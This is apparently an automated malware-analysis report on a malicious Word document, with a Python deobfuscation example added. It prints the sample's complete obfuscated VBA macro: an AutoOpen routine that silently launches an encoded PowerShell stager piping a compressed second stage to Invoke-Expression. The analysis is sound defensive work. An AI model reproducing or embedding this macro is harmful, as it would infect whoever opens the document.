Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5f4d98328b28d15a…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 97.0 KB
Created: 2018-06-01 15:54:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: 728ba1a12370e2742cc673806e59978d
SHA-1: 2819b9fc023143e49266bf506a65e76074824e7a
SHA-256: 5f4d98328b28d15ad35fb7dadc2d7bdb61f00458ad11fe45c6d347486260c8ae
Risk score: 150

Heuristics (6)

  • VBA macros detected medium OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code (modules tdFNRaQVsjio and ftjTiBnQtVNMKJ, extracted as macros.bas below)
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Shell() call whose command line is assembled at runtime from string-returning functions
    Matched line in script
    HnTGoD = CSng(54335 * CInt(61172) + 7493 - 78968)
    uibHIc = oaqivfzkbRZ + Shell(uBUVdDWwb + Chr(vbKeyP) + JiHJpfwpl + waotA + PIuhQC + DhiBaAHqKdt + wjcaHrlizD, OXTVTfl + vbHide + XVaYNJzzA)
    ukVArD = 62867 + Log(8946) - YAjHqp / Atn(9756) / tLkEX / HuIpJk
    The first Shell() argument is Chr(vbKeyP), which is "P", followed by the return values of JiHJpfwpl, waotA, PIuhQC, DhiBaAHqKdt and wjcaHrlizD; JiHJpfwpl starts with "owersHeLL -e", so the call launches powershell.exe with an -EncodedCommand (UTF-16LE base64) argument. The identifiers oaqivfzkbRZ, uBUVdDWwb, OXTVTfl and XVaYNJzzA are never assigned and evaluate to Empty, which On Error Resume Next keeps from raising, so the window-style argument reduces to vbHide (hidden window). Decoding the concatenated base64 gives a one-liner that base64-decodes an inner blob, inflates it through System.IO.Compression.DeflateStream, reads it as ASCII and pipes it to "& ($env:COMSPEC[4,15,25] -join '')", which is "Iex" (Invoke-Expression) under the default COMSPEC of C:\WINDOWS\system32\cmd.exe. The inner blob is the deflate-compressed second stage; this report does not decode it, so the sample's real behaviour (download, persistence, payload) is not visible from the static findings alone.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) stream contains an auto-execution token together with shell/download/object-execution tokens. The rule exists for p-code-only documents and for documents whose source cannot be extracted; in this sample the source was recovered (macros.bas below), so the finding corroborates the source-level Shell and AutoOpen findings rather than replacing them. Had the p-code carried these tokens while the recovered source did not, that mismatch would point to VBA stomping (source stream rewritten to hide what the p-code actually executes).
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    Sub Autoopen() runs as soon as the document is opened with macros enabled; its only meaningful statement is a call to uibHIc, the function that contains the Shell() call, so no further user interaction is needed after the macro-enable click.
    Matched line in script
    End Function
    Sub Autoopen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule's generic description (no modern VBA project recovered, no stronger macro-virus family marker) does not fit this sample: a VBA project was recovered (macros.bas below) and the only auto-execution entry point visible in it is the Sub Autoopen() already reported under OLE_VBA_AUTOOPEN. Treat this as duplicate evidence of the auto-execution entry point, not as a separate WordBasic execution surface, and not as a downloader or parser-CVE attribution.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    The single URL is the DrawingML XML namespace identifier, which appears in any Office document that carries drawing content. It is not a network indicator: do not add it to blocklists or pivot on it. Any download or command-and-control address used by this sample would sit inside the deflate-compressed PowerShell second stage, which the static preview does not decode.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10650 bytes
SHA-256: a50f4f6d48ffa8332ba4c36f328ddfcd185a9f6eb34edfc1e56ffb542f5f5a29

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "tdFNRaQVsjio"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function uibHIc()
On Error Resume Next
YuOaOu = 74629 + Log(55957) - IDlKlO / Atn(84854) / jTziu / zOJji
zisoU = CSng(56708 * CInt(51425) + 47295 - 4207)
PVCqOP = 39850 + Log(47690) - hcwzn / Atn(6854) / drQLFK / JfiKw
HnTGoD = CSng(54335 * CInt(61172) + 7493 - 78968)
uibHIc = oaqivfzkbRZ + Shell(uBUVdDWwb + Chr(vbKeyP) + JiHJpfwpl + waotA + PIuhQC + DhiBaAHqKdt + wjcaHrlizD, OXTVTfl + vbHide + XVaYNJzzA)
ukVArD = 62867 + Log(8946) - YAjHqp / Atn(9756) / tLkEX / HuIpJk
QZCiRU = CSng(80585 * CInt(6357) + 33383 - 53648)
End Function
Sub Autoopen()
On Error Resume Next
GLRHEL = 29975 + Log(98584) - LmsEdW / Atn(3076) / GjOXU / IahZZ
PNbjn = CSng(97547 * CInt(23222) + 34230 - 99088)
uibHIc
waJmQd = 63027 + Log(95393) - uTbwi / Atn(26573) / lBIjW / piizKJ
iKjOQ = CSng(74018 * CInt(76863) + 26414 - 64589)
End Sub


Attribute VB_Name = "ftjTiBnQtVNMKJ"
Function JiHJpfwpl()
On Error Resume Next
GUYOE = 81629 + Log(61093) - aoEWBA / Atn(16526) / wJuodU / ZDoud
OKaNEH = CSng(24403 * CInt(27696) + 93931 - 88975)
RpzYtmjGdh = "owersHeLL -" + "e KABu" + "AGUAVwAtA" + "G8AQ" + "gBKAGUAQ" + "wB" + "UACAAaQBPAC4A" + "YwBPAE0AcAByAGU" + "AUwB" + "zAGkATwBOAC4AZ"
IFkkjp = 7898 + Log(50958) - KmwkU / Atn(55466) / JwLQwC / LddIw
vOCPGj = CSng(46565 * CInt(69153) + 50431 - 87454)
OsSdfpaUk = "ABl" + "AEYAbABh" + "AH" + "QAZQBTA" + "HQ" + "AUg"
kTGTc = 23198 + Log(82171) - cVCPld / Atn(84274) / kYHCj / hbvki
oECjFz = CSng(61796 * CInt(54059) + 93131 - 3009)
dRBwwqHbqj = "BlA" + "EEATQAoAF" + "sA" + "cw" + "B5AFMAdAB" + "FAG0ALgB" + "pAE8AL" + "gBtAGUAbQBvAFIA"
RmQUYs = 98530 + Log(32124) - PaoLTq / Atn(63481) / miYsdN / XTTKn
PJippQ = CSng(31555 * CInt(75540) + 17375 - 66142)
jpQbjBsBDRE = "WQBzAHQAUg" + "BFAGEATQBdACAAW" + "wBDAG8ATgB2A" + "GUAcgB0AF0AOgA6"
TzOOQr = 31652 + Log(28204) - DpRdq / Atn(77289) / MwFZo / ozRFVd
QpdwbZ = CSng(61732 * CInt(98676) + 79423 - 13351)
HnXhIniPUfH = "AEYAcgBP" + "AE0AY" + "gBBAHMA" + "RQA2ADQAUwBUAFI" + "ASQBOA" + "GcAKAAn" + "AFQAWg"
CvWuar = 9907 + Log(98593) - qDqEI / Atn(14712) / IOzLWn / AOLVBR
ZXpdW = CSng(86660 * CInt(12359) + 88408 - 48107)
juhpbi = "BKA" + "FIAYg" + "A1A" + "HMAdwBGAEkAWAB" + "mAEoA" + "KwAwAC8AVw" + "BCAEcAcQBRAFQ" + "AU"
AVbjM = 98004 + Log(49527) - TiXkrv / Atn(11216) / HWjOW / htRjA
mOjOpX = CSng(20825 * CInt(372) + 22571 - 9276)
sEfSoZ = "gBtAG" + "IAVgArAG0Ab" + "wBrAG4AZABFAGs" + "AMw" + "BLA" + "FMALw" + "BiAE" + "EAcABxADcAUw" + "BI" + "AG4AQw"
JiHJpfwpl = RpzYtmjGdh + OsSdfpaUk + dRBwwqHbqj + jpQbjBsBDRE + HnXhIniPUfH + juhpbi + sEfSoZ
End Function
Function waotA()
On Error Resume Next
Plhhik = 79520 + Log(60168) - XGljNK / Atn(6315) / ohSfww / FzIuT
FDCjRd = CSng(77331 * CInt(41412) + 98133 - 16888)
DQQVlUzJkUJ = "Bj" + "AEcAMg" + "BBAE" + "YARwA0AEUAVABpA" + "HEATAA4ADk" + "AOQAxAEQA"
BGDfdz = 2124 + Log(60670) - NMdmH / Atn(32049) / jcjcuL / RCiAw
PbpZqi = CSng(84381 * CInt(91021) + 41115 - 54621)
dzHiidcVtqU = "cwByAFoA" + "SQAxAD" + "kAagBtADgAegAz" + "AG4ANABo" + "AHYAWQBYAG0AOQ" + "AxAHYAeA" + "BWA" + "GYA"
HPzXta = 31286 + Log(52699) - qHtPj / Atn(63814) / zlcuzE / FmWEvd
rLzkU = CSng(59980 * CInt(23107) + 73013 - 46318)
zItaivYNiiX = "eABGAFUAbwB" + "yAF" + "kAdwBsAHkAVABpA" + "FUAdwA5AHgAdA" + "Av" + "AG0ASgBoAFo" + "AQgBSAEwATAB" + "5AFAAUg"
SZwrHi = 49473 + Log(86021) - ouJsi / Atn(254) / QtkWV / wbwvt
LBiLNA = CSng(52830 * CInt(49103) + 16444 - 14214)
hUPPifK = "BhAGIAdAAxA" + "FQAUgBv" + "ADg" + "AUABm" + "ADEAaQBWAGoA" + "SABMAG8AQgB3AE" + "EAdgA3AEUAV"
EzLmoi = 65654 + Log(36701) - kSOSB / Atn(2769) / wbUsM / uhHKiv
GauJvj = CSng(48907 * CInt(18721) + 66342 - 18185)
oVRiWa = "ABHAG8AbABzA" + "DcARA" + "AwADEAYQB" + "rADEAZQ" + "BQAGQASgBtA" + "FUAVg" + "BkA" + "GsA" + "ZgBS" + "AHEAcwBzADI"
Qcbutn = 22775 + Log(19563) - tdwoO / Atn(72292) / Ciiiv / aKJXEW
czPRW = CSng(54037 * CInt(68450) + 26367 - 614)
GLcbiBSXQP = "AOQA4AE0A" + "cgBnAEk" + "ASwBrAHMAdgBQAH" + "IAegA1AHgATQ"
TwYjwd = 54397 + Log(11491) - KRXfDi / Atn(4006) / BQkVip / kwNjRm
BCqKj = CSng(43280 * CInt(6165) + 54045 - 64405)
YGnZa = "ArADEA" + "dQB" + "QADEAOABlADM" + "ATgAzAEYAN" + "gBYAEIAMQArA" + "FgAaQBOA" + "DA"
RKLDES = 22282 + Log(74855) - whzPS / Atn(71029) / jwCPv / HIQUot
faZjDD = CSng(47611 * CInt(56912) + 73448 - 60382)
iBPkl = "ATwBo" + "AC8AUA" + "BpAGgAOQBKAD" + "cAegB0A"
CtwoUE = 74033 + Log(46174) - XnEZS / Atn(72589) / CDmjdS / pXIOMP
fzTYN = CSng(4087 * CInt(84441) + 36939 - 77506)
rHdUlwKFsh = "GYAZABKAE" + "EAbABmAHUAd" + "wBJAE4AdQB" + "NAEsAcwBuAG8" + "AWAAyAHQATwA4"
waotA = DQQVlUzJkUJ + dzHiidcVtqU + zItaivYNiiX + hUPPifK + oVRiWa + GLcbiBSXQP + YGnZa + iBPkl + rHdUlwKFsh
End Function
Function PIuhQC()
On Error Resume Next
iQTbs = 43134 + Log(179) - RZWaz / Atn(91199) / jFHRL / aINspk
EjljP = CSng(51706 * CInt(2867) + 25226 - 97683)
wzwClYKNqwo = "AFYAdgA" + "0ADUAbwBFAFI" + "AdABvADUAZ" + "ABoADIASAA5" + "AGU" + "AYwB" + "xAGUASg" + "BMA" + "DQAawBoA" + "HIAcQBFAHoAKwB"
wBIwu = 79278 + Log(80345) - wYYdw / Atn(70130) / cWIHF / ClzMho
KYtnls = CSng(20634 * CInt(30850) + 6688 - 86692)
HwlUawhj = "3AGcAMwBGA" + "FgANwBUAHkAUgBC" + "AFYANQB4AE4AT" + "ABvA" + "EEAMQBYA" + "E0AawB" + "IAGYAYQBLAEUA" + "ZwBYAG8AcgB" + "uAE8AR"
TXmrMc = 53171 + Log(74600) - hmEtF / Atn(86244) / uPJkMA / uZikr
ZmZcc = CSng(77173 * CInt(65687) + 92365 - 20691)
toUwiCRTvu = "ABhAG0" + "AMwB4AH" + "cAQQA0AGcA" + "Mw" + "AzAGIAVQ" + "BWAE4AVABO" + "AEEAZABk" + "ADAAMABCADQAaQB" + "yADkAbwBEAFQ" + "AT"
WkvnG = 46369 + Log(37427) - hsNQA / Atn(89139) / SSVsS / sjibuN
QRKijq = CSng(74827 * CInt(283) + 34245 - 25482)
zZzsBka = "AA3A" + "FQASgByAGk" + "ARgBNAEU" + "AeABBA" + "G0AMAB"
WGdCzq = 17526 + Log(71918) - UKVMDs / Atn(81946) / ANMLKr / QhfhKH
AFYWL = CSng(9670 * CInt(79956) + 69342 - 83452)
aRQOVPN = "hAEMAa" + "ABPAHMASQBvA" + "HYAaABxAEUAd" + "QBNAG0" + "ANgB0AFUAb" + "gBMA" + "EEAdwB0ADgAa"
JiHFw = 95762 + Log(58946) - zIzEBl / Atn(22649) / smRKb / XMJPnh
loQVuB = CSng(53246 * CInt(69648) + 58854 - 39738)
RsjpO = "QBOAEoANAB" + "SAF" + "QAbQB0AHUARABo" + "AGcAYQBPADgAc" + "wB" + "PAHcARwA"
BqKwIv = 8717 + Log(76532) - zMDSj / Atn(81453) / LuwjJz / OUijH
kiORiJ = CSng(71724 * CInt(31549) + 47744 - 6627)
VlizSTVA = "0AEM" + "AWAA2" + "AHA" + "AcQBwAHgAZQ" + "B2AHkAZgB4AG8AQ"
LAWjZ = 70803 + Log(97625) - DTQpio / Atn(50079) / jwdaM / EaSzmk
FSmri = CSng(40669 * CInt(18580) + 51402 - 51475)
IQKSSuhRo = "QByAD" + "kAdABoAF" + "MAYwBLAF" + "oATQBxAHkAMw" + "BWAEUAMwB2AD" + "IARA" + "BC" + "AEMAKwBMADk" + "AawBq" + "AGwAYgBWAD"
PIuhQC = wzwClYKNqwo + HwlUawhj + toUwiCRTvu + zZzsBka + aRQOVPN + RsjpO + VlizSTVA + IQKSSuhRo
End Function
Function DhiBaAHqKdt()
On Error Resume Next
jjuDQT = 79151 + Log(61318) - IFETuc / Atn(2260) / vwQbw / SwAdz
TQdFH = CSng(88640 * CInt(82795) + 35633 - 88594)
razwsUSXkz = "EAN" + "QBVAE0" + "AVwA0" + "AFY"
GdRJbR = 313 + Log(96674) - OhHNiK / Atn(24583) / UcEPqr / JrczLA
iTIpmJ = CSng(79738 * CInt(74534) + 1832 - 96987)
RvhrFbRD = "AKwBmAEwAU" + "gBlADQAS" + "AByAEsASAArAD" + "MAYQAvAHEAUw" + "BzAGoAWQB" + "pAEgALwBT" + "AE" + "IANg" + "BuAG0ANAB"
ljTLC = 97388 + Log(91233) - IWqpYP / Atn(73713) / zkoAmq / wnFoXC
ibGMEI = CSng(24212 * CInt(96264) + 78923 - 57956)
TNKmLlSNFc = "0AEYARwBFAG8" + "ARgBuAFIA" + "ZQAw" + "AEIAUABHAF" + "IASABkAGUA" + "awBUAFIAawBHAHU" + "AdAA4AFoAVQB" + "WAGsAeAB" + "YAFYAOQAwADkATg" + "AxADQAUg"
QrPsi = 68939 + Log(49823) - XqCMz / Atn(31374) / GUXwKY / NoPiLL
ZBvKzV = CSng(98060 * CInt(25668) + 12052 - 18210)
VvalJtDjt = "BKACsAbwAy" + "AGQA" + "TABsAGoANwBiAE" + "8AZgArAGoAdAA" + "5ADEAVgBl" + "AD" + "AAKwB5AE0A"
OWiFf = 27946 + Log(16995) - KBrasU / Atn(60832) / ibcvY / WwoHC
uvsOO = CSng(52202 * CInt(91255) + 3023 - 25833)
wClbolr = "cQB0A" + "GwAUABsAC8AawB1" + "AHIALwBKADEATQ" + "BRA" + "HUAagBhAH" + "cASAB0AEsATAA" + "xAGkAZwBSA" + "FgAKwB5ADgA"
IAaOB = 54749 + Log(64621) - DqRzUl / Atn(56539) / zzAjQ / MIBOI
LQYiKW = CSng(36388 * CInt(53979) + 41244 - 18795)
fJjMzfdB = "RgBCADQ" + "AU" + "gBtAHQ" + "AUgBYAE4A" + "ZQByADYAW" + "QBLA" + "EcAKwA2AHMAOABF"
tQNDM = 67414 + Log(95473) - HkAdvB / Atn(63082) / joRMmT / PmRnm
TBsnmG = CSng(30632 * CInt(6074) + 39507 - 99903)
zVJAjtFu = "AHg" + "AdQBXAFAAYwA1A" + "FAAUgBuAHQAV" + "ABYAG" + "sAOABuAGY" + "ANABCACcA" + "KQAgACw" + "AIABbAFMAWQ" + "BTAHQAZQB" + "NAC"
EmBsL = 75191 + Log(55759) - ijinDw / Atn(51864) / MwRuvL / ojHqJu
nPosI = CSng(99830 * CInt(34467) + 21996 - 8207)
lWPjjmQqj = "4AaQ" + "BvAC4AQwBPAE0A" + "UABSAEUAcw" + "BTAGkAbwBOAC4AQ" + "wBPAG0AcAByA"
oKHRkN = 78424 + Log(82065) - jDFCF / Atn(56942) / INIDwT / NsTwLo
IBtSGl = CSng(6877 * CInt(24763) + 7565 - 41805)
QREzuXGrkj = "GUAUwBTAEkA" + "TwBuA" + "E0AbwBEAGUAX" + "QA6ADoARABFAGM" + "ATwBN" + "AFA" + "AcgBFA" + "HMAUwApA" + "HwAIA"
DhiBaAHqKdt = razwsUSXkz + RvhrFbRD + TNKmLlSNFc + VvalJtDjt + wClbolr + fJjMzfdB + zVJAjtFu + lWPjjmQqj + QREzuXGrkj
End Function
Function wjcaHrlizD()
On Error Resume Next
zwONi = 24235 + Log(68003) - QrECA / Atn(4564) / cuYQP / CkXCLk
spvJnk = CSng(94550 * CInt(40803) + 36359 - 99411)
PwqkGFkZdsj = "BmAE8AcgBlA" + "GEAQwBIAC0" + "AbwBCAEoARQBDA" + "FQAew" + "AgAG4AZQBXAC0Ab" + "wBCAEoA" + "ZQBDAFQAIABJAG8"
GPwYj = 7934 + Log(97596) - QkIIon / Atn(12606) / zOrLXc / WavuPQ
zJuPJ = CSng(99654 * CInt(63178) + 58563 - 417)
WAivCj = "ALgBzAH" + "QAcgB" + "lAEEATQByAG" + "UAQ" + "QB" + "EAE" + "UAcgAo"
DSUOk = 61831 + Log(15088) - juAHb / Atn(77096) / ifazoJ / cKlwOY
GISNXI = CSng(10390 * CInt(15540) + 41698 - 72929)
MJzzI = "ACAAJABf" + "AC" + "wAWwBUAGUAeABU" + "AC4ARQ" + "BOAGMA" + "TwBkAGkATgBHAF0"
nXiWFs = 65605 + Log(13167) - fUGhLJ / Atn(38065) / JdmSis / lhtEf
WJoCBl = CSng(1659 * CInt(10606) + 11185 - 85103)
tuAfZQG = "AOgA6A" + "EEAcwBjAEkASQAg" + "ACkAfQAgACkALgB" + "yAGUAQQBkAFQ" + "ATwBFAG4AZA" + "AoACAA" + "KQB"
HvwmC = 71768 + Log(4576) - oPwsz / Atn(55134) / iIlXz / bwIKSf
YSkDl = CSng(42100 * CInt(21100) + 75555 - 89520)
XCjqf = "8ACYAIAAoACAA" + "JABlAG4AdgA" + "6AGMAbwBNAFMAUA" + "BlAGMAWwA0ACw" + "AMQA1ACwAMgA" + "1AF0ALQB" + "KAG8ASQB" + "OACcAJwAp"
jwqqrR = 45558 + Log(33128) - ZwGsUi / Atn(85440) / jzpbkG / pVivHd
RkUBb = CSng(17664 * CInt(74459) + 69013 - 59706)
zUDVai = "AA=="
wjcaHrlizD = PwqkGFkZdsj + WAivCj + MJzzI + tuAfZQG + XCjqf + zUDVai
End Function
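What the OLE_VBA_SHELL finding leaves to the analyst is reassembling the Shell() argument from the string-builder functions in the script above and decoding the resulting PowerShell -e payload. The Python below is an added example written for this report, not code from the report generator or from oletools: a small static resolver for the constructs macros.bas uses (concatenated string literals, Chr(vbKeyP), values returned by other Functions, never-assigned identifiers that On Error Resume Next turns into Empty, and the $env:COMSPEC[4,15,25] -join '' trick that yields Iex). The VBA it runs on is a constructed sample in the same shape with a harmless payload; the default COMSPEC value, the -e/-enc/-EncodedCommand spellings and all helper names (parse_vba, analyse and the rest) are assumptions of this example.

```python
"""Resolver for concatenation-obfuscated VBA stagers like macros.bas above (added
example, not report or oletools code).  Assumes the victim's %COMSPEC% is the default
C:\\WINDOWS\\system32\\cmd.exe and PowerShell is launched with -e/-enc/-EncodedCommand."""
import base64
import re

FUNC_RE = re.compile(r"^(?:Public\s+|Private\s+)?(?:Function|Sub)\s+(\w+)\s*\(", re.I)
END_RE = re.compile(r"^End\s+(?:Function|Sub)\b", re.I)
ASSIGN_RE = re.compile(r"^(\w+)\s*=\s*(.+)$")
CHR_RE = re.compile(r"Chr\s*\(\s*(?:vbKey(\w)|(\d+))\s*\)", re.I)
SHELL_RE = re.compile(r"\bShell\s*\(", re.I)
PS_ENC_RE = re.compile(r"(?i)powershell\b.*?\s-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
ENV_IDX_RE = re.compile(r"\$env:comspec\[([\d,\s]+)\]\s*-join\s*''", re.I)
COMSPEC = r"C:\WINDOWS\system32\cmd.exe"   # assumed default on the victim host

def parse_vba(src):
    """Map each Function/Sub name to its ordered (lhs, rhs) assignments."""
    procs, cur = {}, None
    for line in (ln.strip() for ln in src.splitlines()):
        if m := FUNC_RE.match(line):
            cur, procs[m.group(1)] = m.group(1), []
        elif END_RE.match(line):
            cur = None
        elif cur and (m := ASSIGN_RE.match(line)):
            procs[cur].append((m.group(1), m.group(2)))
    return procs

def split_top(expr, sep):
    """Split on sep outside quotes/parentheses; an unmatched ')' ends the expression."""
    parts, buf, depth, quoted = [], "", 0, False
    for ch in expr:
        quoted ^= ch == '"'
        if not quoted and ch in "()":
            if ch == ")" and depth == 0:
                break                          # closing paren of the enclosing call
            depth += 1 if ch == "(" else -1
        if not quoted and ch == sep and depth == 0:
            parts, buf = parts + [buf.strip()], ""
        else:
            buf += ch
    return parts + [buf.strip()]

def eval_expr(expr, procs, locals_, depth=0):
    """Resolve a '+' concatenation to text; never-assigned names are '' (Empty)."""
    if depth > 64:
        raise RecursionError("expression nesting too deep")
    out = []
    for term in split_top(expr, "+"):
        if len(term) > 1 and term[0] == term[-1] == '"':
            out.append(term[1:-1].replace('""', '"'))          # VBA string literal
        elif m := CHR_RE.fullmatch(term):                      # Chr(vbKeyP) -> "P"
            out.append(m.group(1).upper() if m.group(1) else chr(int(m.group(2))))
        elif term in locals_:
            out.append(eval_expr(locals_[term], procs, locals_, depth + 1))
        elif term in procs:                                    # value of a Function
            loc = dict(procs[term])            # later assignments win, as in VBA
            out.append(eval_expr(loc.pop(term, '""'), procs, loc, depth + 1))
        else:
            out.append("")     # undeclared: Empty, masked by On Error Resume Next
    return "".join(out)

def shell_commands(procs):
    """(procedure, resolved first argument) for every Shell() call in the source."""
    found = []
    for name, assigns in procs.items():
        for _, rhs in assigns:
            for m in SHELL_RE.finditer(rhs):
                first = split_top(rhs[m.end():], ",")[0]
                found.append((name, eval_expr(first, procs, dict(assigns))))
    return found

def decode_encoded_command(cmdline):
    """UTF-16LE text behind 'powershell -e <base64>', or None if absent."""
    if not (m := PS_ENC_RE.search(cmdline)):
        return None
    b64 = m.group(1)
    return base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-16-le")

def resolve_comspec_slices(script):
    """Rewrite $env:COMSPEC[i,j,k]-join'' to the literal it yields (here 'Iex')."""
    def pick(m):
        return "'" + "".join(COMSPEC[int(i)] for i in m.group(1).split(",")) + "'"
    return ENV_IDX_RE.sub(pick, script)

def analyse(src):
    """(proc, cmdline, decoded script, script with Iex resolved) per Shell() call."""
    out = []
    for proc, cmd in shell_commands(parse_vba(src)):
        script = decode_encoded_command(cmd)
        out.append((proc, cmd, script, script and resolve_comspec_slices(script)))
    return out

# Constructed sample, not the real macro: uibHIc/Autoopen are the page's own lines,
# the chunk builders are shortened, and the harmless payload ends with the same
# COMSPEC-slice Iex trick the real document's decoded command line uses.
SAMPLE_SCRIPT = "( 'Get-Date' )|& ( $env:cOMSPec[4,15,25]-JoIN'')"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_VBA = f'''
Function uibHIc()
On Error Resume Next
YuOaOu = 74629 + Log(55957) - IDlKlO / Atn(84854) / jTziu / zOJji
uibHIc = oaqivfzkbRZ + Shell(uBUVdDWwb + Chr(vbKeyP) + headPart + tailPart, OXTVTfl + vbHide)
End Function
Sub Autoopen()
uibHIc
End Sub
Function headPart()
a1 = "owersHeLL -" + "e " + "{SAMPLE_B64[:20]}"
headPart = a1 + "{SAMPLE_B64[20:55]}"
End Function
Function tailPart()
tailPart = "{SAMPLE_B64[55:90]}" + "{SAMPLE_B64[90:]}"
End Function
'''
```

Calling analyse() on the macros.bas text above instead of SAMPLE_VBA yields the real "PowersHeLL -e ..." command line and its decoded one-liner; the inner base64 blob that one-liner feeds to DeflateStream is raw deflate, so a zlib.decompress(blob, -15) pass is still needed to reach the second stage, which this example deliberately stops short of.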